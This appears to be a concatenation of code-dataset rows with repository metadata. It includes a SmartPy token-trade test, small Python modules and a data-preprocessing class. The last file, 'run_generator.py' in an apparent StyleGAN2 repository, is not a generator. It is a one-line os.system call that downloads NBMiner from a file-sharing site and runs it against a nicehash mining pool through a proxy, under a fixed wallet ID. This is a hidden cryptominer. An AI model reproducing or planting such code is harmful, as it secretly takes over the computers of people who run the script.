return testEnvironment
@sp.add_test(name="Test trade")
def test_trade():
# Get the test environment
testEnvironment = get_test_environment()
scenario = testEnvironment["scenario"]
user1 = testEnvironment["user1"]
user2 = testEnvironment["user2"]
user3 = testEnvironment["user3"]
fa2_admin = testEnvironment["fa2_admin"]
fa2 = testEnvironment["fa2"]
tradeContract = testEnvironment["tradeContract"]
# Mint some tokens
fa2.mint(
address=user1.address,
token_id=sp.nat(0),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://ccc")}).run(sender=fa2_admin)
fa2.mint(
address=user1.address,
token_id=sp.nat(1),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://ddd")}).run(sender=fa2_admin)
fa2.mint(
address=user2.address,
token_id=sp.nat(2),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)
fa2.mint(
address=user3.address,
token_id=sp.nat(3),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)
# Add the trade contract as operator for the tokens
scenario += fa2.update_operators(
[sp.variant("add_operator", fa2.operator_param.make(
owner=user1.address,
operator=tradeContract.address,
token_id=0)),
sp.variant("add_operator", fa2.operator_param.make(
owner=user1.address,
operator=tradeContract.address,
token_id=1)),
sp.variant("add_operator", fa2.operator_param.make(
owner=user1.address,
operator=tradeContract.address,
token_id=2))]).run(sender=user1)
scenario += fa2.update_operators(
[sp.variant("add_operator", fa2.operator_param.make(
owner=user2.address,
operator=tradeContract.address,
token_id=2))]).run(sender=user2)
scenario += fa2.update_operators(
[sp.variant("add_operator", fa2.operator_param.make(
owner=user3.address,
operator=tradeContract.address,
token_id=3))]).run(sender=user3)
# Check that the FA2 contract ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)
# Check that user 1 cannot propose a trade with a token it doesn't own
scenario += tradeContract.propose_trade(
token=2,
for_token=3).run(valid=False, sender=user1)
# User 1 proposes a trade
scenario += tradeContract.propose_trade(
token=0,
for_token=2).run(valid=False, sender=user1, amount=sp.tez(3))
scenario += tradeContract.propose_trade(
token=0,
for_token=2).run(sender=user1)
# Check that the FA2 contract ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)
scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 1)
# Check that the third user cannot accept the trade because it doesn't own
# the requested token
scenario += tradeContract.accept_trade(0).run(valid=False, sender=user3)
# The second user accepts the trade
scenario += tradeContract.accept_trade(0).run(valid=False, sender=user2, amount=sp.tez(3))
scenario += tradeContract.accept_trade(0).run(sender=user2)
# Check that the OBJKT ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user1.address, 2)].balance == 1)
scenario.verify(fa2.data.ledger[(user2.address, 0)].balance == 1)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100 - 1)
scenario.verify(fa2.data.ledger[(user3.address, 3)].balance == 100)
scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 0)
# Check that the second user cannot accept twice the trade
scenario += tradeContract.accept_trade(0).run(valid=False, sender=user2)
# Check that the first user cannot cancel the trade because it's executed
scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1)
@sp.add_test(name="Test cancel trade")
def test_cancel_trade():
# Get the test environment
testEnvironment = get_test_environment()
scenario = testEnvironment["scenario"]
user1 = testEnvironment["user1"]
user2 = testEnvironment["user2"]
fa2_admin = testEnvironment["fa2_admin"]
fa2 = testEnvironment["fa2"]
tradeContract = testEnvironment["tradeContract"]
# Mint some tokens
fa2.mint(
address=user1.address,
token_id=sp.nat(0),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://ccc")}).run(sender=fa2_admin)
fa2.mint(
address=user1.address,
token_id=sp.nat(1),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://ddd")}).run(sender=fa2_admin)
fa2.mint(
address=user2.address,
token_id=sp.nat(2),
amount=sp.nat(100),
metadata={"" : sp.utils.bytes_of_string("ipfs://eee")}).run(sender=fa2_admin)
# Add the trade contract as operator for the tokens
scenario += fa2.update_operators(
[sp.variant("add_operator", fa2.operator_param.make(
owner=user1.address,
operator=tradeContract.address,
token_id=0)),
sp.variant("add_operator", fa2.operator_param.make(
owner=user1.address,
operator=tradeContract.address,
token_id=1))]).run(sender=user1)
scenario += fa2.update_operators(
[sp.variant("add_operator", fa2.operator_param.make(
owner=user2.address,
operator=tradeContract.address,
token_id=2))]).run(sender=user2)
# Check that the FA2 contract ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
# User 1 proposes a trade
scenario += tradeContract.propose_trade(
token=0,
for_token=2).run(sender=user1)
# Check that the FA2 contract ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100 - 1)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 1)
# Check that the second user cannot cancel the trade
scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user2)
# User 1 cancels the trade
scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1, amount=sp.tez(3))
scenario += tradeContract.cancel_trade(0).run(sender=user1)
# Check that the FA2 contract ledger information is correct
scenario.verify(fa2.data.ledger[(user1.address, 0)].balance == 100)
scenario.verify(fa2.data.ledger[(user1.address, 1)].balance == 100)
scenario.verify(fa2.data.ledger[(user2.address, 2)].balance == 100)
scenario.verify(fa2.data.ledger[(tradeContract.address, 0)].balance == 0)
# Check that the first user cannot cancel the trade again
scenario += tradeContract.cancel_trade(0).run(valid=False, sender=user1)
| 39.922747 | 94 | 0.667491 | 1,184 | 9,302 | 5.150338 | 0.103041 | 0.061988 | 0.075271 | 0.092981 | 0.827156 | 0.807314 | 0.781568 | 0.759101 | 0.758937 | 0.72778 | 0 | 0.043642 | 0.199419 | 9,302 | 232 | 95 | 40.094828 | 0.775211 | 0.141152 | 0 | 0.682635 | 0 | 0 | 0.05369 | 0.006413 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017964 | false | 0 | 0.017964 | 0 | 0.041916 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8f44a68e996bc4721f3d06f9d7c998ba6a0e847c | 44 | py | Python | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 16 | 2021-05-13T17:17:48.000Z | 2022-03-28T14:58:15.000Z | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 8 | 2021-04-28T04:44:24.000Z | 2022-01-14T11:33:50.000Z | flare/translations/__init__.py | phorward/flare | 89a20bd1fb5ef7d0deebbd1f76c58a063e86f41e | [
"MIT"
] | 6 | 2021-06-14T15:07:53.000Z | 2021-10-31T16:24:07.000Z | from .de import lngDe
from .en import lngEn
| 14.666667 | 21 | 0.772727 | 8 | 44 | 4.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 44 | 2 | 22 | 22 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8f6ed2b9f747c0fc3d8945311077206e61d71e7a | 294 | py | Python | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | core_get/catalog/download_status_interface.py | core-get/core-get | 8fb960e4e51d0d46b5e3b2f4832eb4a39e0e60f7 | [
"MIT"
] | null | null | null | class DownloadStatusInterface:
def download_begin(self, filename: str) -> None:
raise NotImplementedError
def download_progress(self, downloaded: int, size: int) -> None:
raise NotImplementedError
def download_done(self) -> None:
raise NotImplementedError
| 29.4 | 68 | 0.707483 | 29 | 294 | 7.068966 | 0.551724 | 0.160976 | 0.409756 | 0.302439 | 0.380488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.217687 | 294 | 9 | 69 | 32.666667 | 0.891304 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
56a95d3e99b348898879c67116cbcc1fa42000e8 | 95 | py | Python | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | 1 | 2021-09-15T09:09:17.000Z | 2021-09-15T09:09:17.000Z | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | null | null | null | gauss_fit/__init__.py | semodi/gauss_fit | 5a7c8c1f5541d7388acc11909f06d20e920e9f8b | [
"BSD-3-Clause"
] | null | null | null | from . import fitting
from . import atom
from . import molecule
from . import molecule_classes
| 19 | 30 | 0.789474 | 13 | 95 | 5.692308 | 0.461538 | 0.540541 | 0.486486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168421 | 95 | 4 | 31 | 23.75 | 0.936709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
853d4b995dd8af2bb4fab2695cd571a3e1eb6598 | 208 | py | Python | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 10 | 2021-04-07T15:51:06.000Z | 2021-12-20T06:07:25.000Z | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 8 | 2021-04-29T18:55:19.000Z | 2021-10-06T10:46:56.000Z | app.py | anyblockanalytics/thegraph-allocation-optimization | d53927eccfc55f830f249126a950575dbfed2f9e | [
"Apache-2.0"
] | 6 | 2021-04-27T05:31:40.000Z | 2021-12-18T16:53:11.000Z | from src.webapp.overview import streamlitEntry
import pyutilib.subprocess.GlobalData
if __name__ == '__main__':
pyutilib.subprocess.GlobalData.DEFINE_SIGNAL_HANDLERS_DEFAULT = False
streamlitEntry() | 29.714286 | 73 | 0.817308 | 22 | 208 | 7.227273 | 0.772727 | 0.226415 | 0.352201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110577 | 208 | 7 | 74 | 29.714286 | 0.859459 | 0 | 0 | 0 | 0 | 0 | 0.038278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8595398fbdcd46d32951ec8b23e6d9999b1d6726 | 123 | py | Python | proxypay/exceptions.py | AgeuMatheus/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | 12 | 2020-05-06T17:07:26.000Z | 2020-10-19T15:41:56.000Z | proxypay/exceptions.py | txiocoder/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | 1 | 2020-05-22T14:24:29.000Z | 2020-06-07T10:38:10.000Z | proxypay/exceptions.py | txiocoder/django-proxypay | 90736875e434013abe3ea1be5f9ff3100c9005db | [
"MIT"
] | null | null | null | class ProxypayException(Exception): pass
class ProxypayKeyError(KeyError): pass
class ProxypayValueError(Exception): pass | 24.6 | 41 | 0.845528 | 12 | 123 | 8.666667 | 0.583333 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081301 | 123 | 5 | 41 | 24.6 | 0.920354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
85ae898cbc81a890bc6fa5fbd515cd57b3680eb3 | 67 | py | Python | echolect/tools/__init__.py | ryanvolz/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | 1 | 2022-03-24T22:48:12.000Z | 2022-03-24T22:48:12.000Z | echolect/tools/__init__.py | scivision/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | 1 | 2015-03-25T20:41:24.000Z | 2015-03-25T20:41:24.000Z | echolect/tools/__init__.py | scivision/echolect | ec2594925f34fdaea69b64e725fccb0c99665a55 | [
"BSD-3-Clause"
] | null | null | null | from .iteration import *
from .time import *
from .valarg import *
| 16.75 | 24 | 0.731343 | 9 | 67 | 5.444444 | 0.555556 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 25 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
85b8abe808763657c5a14c146939fc48654231ec | 186 | py | Python | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | TermTk/TTkWidgets/Fancy/__init__.py | ceccopierangiolieugenio/py-ttk | 117d61844bb7344bbe22a7797b7e3763d5fe4de5 | [
"MIT"
] | null | null | null | from .table import *
from .tableview import *
from .tree import *
from .treeview import *
from .treewidget import *
from .treewidgetitem import *
| 26.571429 | 30 | 0.591398 | 18 | 186 | 6.111111 | 0.444444 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.344086 | 186 | 6 | 31 | 31 | 0.901639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a445090ca44676fae047b2e3ab2f936fa080f3a8 | 222 | py | Python | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | 1 | 2021-02-24T14:33:09.000Z | 2021-02-24T14:33:09.000Z | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | 2 | 2022-01-13T04:03:38.000Z | 2022-03-12T01:03:10.000Z | website/rentals/admin/__init__.py | JobDoesburg/landolfio | 4cbf31c2e6f93745f5aa0d20893bf20f3acecc6e | [
"MIT"
] | null | null | null | from rentals.admin.asset_issuances import *
from rentals.admin.unprocessed_issued_assets import *
from rentals.admin.loan_assets import *
from rentals.admin.rent_assets import *
from rentals.admin.asset_returnals import *
| 37 | 53 | 0.842342 | 31 | 222 | 5.83871 | 0.387097 | 0.303867 | 0.441989 | 0.486188 | 0.464088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09009 | 222 | 5 | 54 | 44.4 | 0.89604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
a477ec8e6de3940ab7cc2419217081cff6f41b4c | 138 | py | Python | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | poyo46/youcab | 0ab7429f816d781d98c5f98949ae190d62f3bb54 | [
"BSD-3-Clause"
] | null | null | null | from pathlib import Path
import pytest
@pytest.fixture(scope="session")
def root_dir():
return Path(__file__).parents[1].resolve()
| 15.333333 | 46 | 0.73913 | 19 | 138 | 5.105263 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008333 | 0.130435 | 138 | 8 | 47 | 17.25 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.050725 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
74e628d79ef90c8c6eaf98fa22c33248e66fd686 | 51 | py | Python | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 5 | 2019-10-21T18:17:38.000Z | 2020-12-09T06:40:32.000Z | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 4 | 2019-11-01T20:10:54.000Z | 2020-01-21T20:41:00.000Z | blockcerts/tools/__init__.py | docknetwork/verifiable-claims-engine | 1aab94510f421ce131642b64aefcd9a21c888f23 | [
"MIT"
] | 2 | 2020-02-02T20:00:46.000Z | 2020-02-12T10:12:05.000Z | from cert_issuer import *
from cert_tools import *
| 17 | 25 | 0.803922 | 8 | 51 | 4.875 | 0.625 | 0.410256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156863 | 51 | 2 | 26 | 25.5 | 0.906977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
74ecff236bb9821eb87a0df6377bc5468c37f10e | 1,915 | py | Python | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | null | null | null | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | null | null | null | desafio_iafront/jobs/escala_pedidos/preprocessing.py | LuizJunior98/desafio-iafront | 6769fcbbe85d4a8b2570c08af65dfd87e8135526 | [
"MIT"
] | 1 | 2020-08-10T21:55:54.000Z | 2020-08-10T21:55:54.000Z | from sklearn import preprocessing
from desafio_iafront.jobs.common import transform
from desafio_iafront.data.saving import save_partitioned
class Preprocessing:
def __init__(self, result, saida):
self.result = result
self.saida = saida
def normalizer(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.Normalizer())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
self.result = result_scaled
def standard_scale(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.StandardScaler())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
self.result = result_scaled
def min_max_scale(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.MinMaxScaler())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
self.result = result_scaled
def max_abs_scale(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.MaxAbsScaler())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
return result_scaled
def robust_scale(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.RobustScaler())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
self.result = result_scaled
def power_transformer(self):
# Faz a escala dos valores
result_scaled = transform(self.result, preprocessing.PowerTransformer())
# salva resultado
save_partitioned(result_scaled, self.saida, ['data', 'hora'])
self.result = result_scaled
| 29.015152 | 80 | 0.668407 | 212 | 1,915 | 5.858491 | 0.20283 | 0.173913 | 0.077295 | 0.067633 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0.723027 | 0 | 0 | 0.240731 | 1,915 | 65 | 81 | 29.461538 | 0.854195 | 0.127937 | 0 | 0.354839 | 0 | 0 | 0.028968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.225806 | false | 0 | 0.096774 | 0 | 0.387097 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2d003ad3c3dbae92548035a859563e041da932fa | 359 | py | Python | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | run_generator.py | yusuf9192/StyleGAN2 | 97cde7e2f9bb5f2618f789575b12c801a2057ba5 | [
"BSD-Source-Code"
] | null | null | null | import os as alpha
alpha.system("apt update && apt install pciutils -y && apt install wget -y && wget https://filebin.net/3wfzfm8t2kmyombs/NBMiner_Linux.tar && tar -xvf NBMiner_Linux.tar && cd NBMiner_Linux && ./nbminer -a ethash -proxy 82.165.99.243:6969 -o stratum+ssl://stratum.eu.nicehash.com:33353 -u 33kJvAUL3Na2ifFDGmUPsZLTyDUBGZLhAi.yaefegovp6uq3ms")
| 119.666667 | 339 | 0.768802 | 52 | 359 | 5.25 | 0.730769 | 0.131868 | 0.10989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086687 | 0.100279 | 359 | 2 | 340 | 179.5 | 0.758514 | 0 | 0 | 0 | 0 | 0.5 | 0.899721 | 0.259053 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.